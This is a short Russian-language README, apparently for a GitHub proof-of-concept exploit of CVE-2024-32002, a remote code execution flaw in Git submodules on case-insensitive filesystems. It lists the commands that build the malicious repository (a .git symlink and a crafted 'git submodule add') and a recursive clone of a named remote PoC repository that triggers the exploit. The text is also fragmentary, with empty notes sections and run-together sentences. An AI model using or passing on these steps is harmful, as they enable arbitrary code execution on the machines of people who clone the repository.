
Эксплойт proof-of-concept для CVE-2024-32002, демонстрирующий удалённое выполнение кода через вредоносные подмодули Git в файловых системах, нечувствительных к регистру символов.
POC для CVE-2024-32002, демонстрирующий удалённое выполнение кода (RCE).
См. cve-2024-32002-poc-rce для связанного репозитория подмодуля.
.git..gitmodules, определяющий вредоносный подмодуль.Этот репозиторий был создан в Linux (если точнее, в WSL2). Это важно: вредоносный репозиторий можно создать только в регистрозависимой файловой системе.
ln -s .git submodule
Примечания:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Примечания:
.git, который отслеживает статус git для подмодулей.Эта уязвимость затрагивает только Windows и macOS, поскольку в обеих системах файловые системы не различают регистр символов.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git